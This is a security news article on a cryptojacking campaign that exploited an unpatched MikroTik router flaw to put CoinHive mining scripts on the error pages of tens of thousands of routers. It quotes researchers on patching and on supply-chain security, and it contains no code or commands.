Security researchers have uncovered a large-scale router compromise that has seen thousands of routers infected with malware based around the CoinHive browser miner.
The attack exploits a vulnerability in MikroTik routers, which although patched by the vendor back in April has not been patched by many end users - a common issue with routers that are rarely rebooted. The result, according to researcher Simon Kenin, is more than 70,000 routers have been infected, mainly in Brazil to date but with the potential to spread world-wide.
The attackers have used the functionality of the MikroTik routers to create a custom error page with a CoinHive script embedded in it, so every time a user gets an online error, the CoinHive script page is displayed, and the user unwittingly mines the Monero cryptocurrency for the attacker. According to the researcher, there was initially a script that inserted the CoinHive script into every page visited, but this was presumably too noticeable, so the attackers scaled back to the more stealthy error page strategy.
Kenin noted in his analysis that the cryptomining/cryptojacking trend is clearly on the rise, ascribing the increasing popularity to better ransomware awareness among enterprises and individuals, and more stable payouts from compromised PCs mining cryptocurrencies.
"This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible, this attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale", he concluded in a blogpost.
Javvad Malik, security advocate at AlienVault told SC Media that the attack highlights a wider logistical problem: "As we see the number of connected devices, both in terms of IoT, and other hardware such as routers continue to grow, the challenge of keeping an inventory of all assets, and keeping them up to date becomes increasingly difficult.
"It is why it has become imperative that manufacturers employ rigorous security testing during the product development phase, as well as retaining easy and efficient means through which these devices can be updated. Unfortunately, the answer is seldom as simple as this, as there is usually a supply chain with many parties contributing to the various aspects of software, hardware, white labelling etc, before it gets to the customer. And securing this entire chain is challenging to say the least."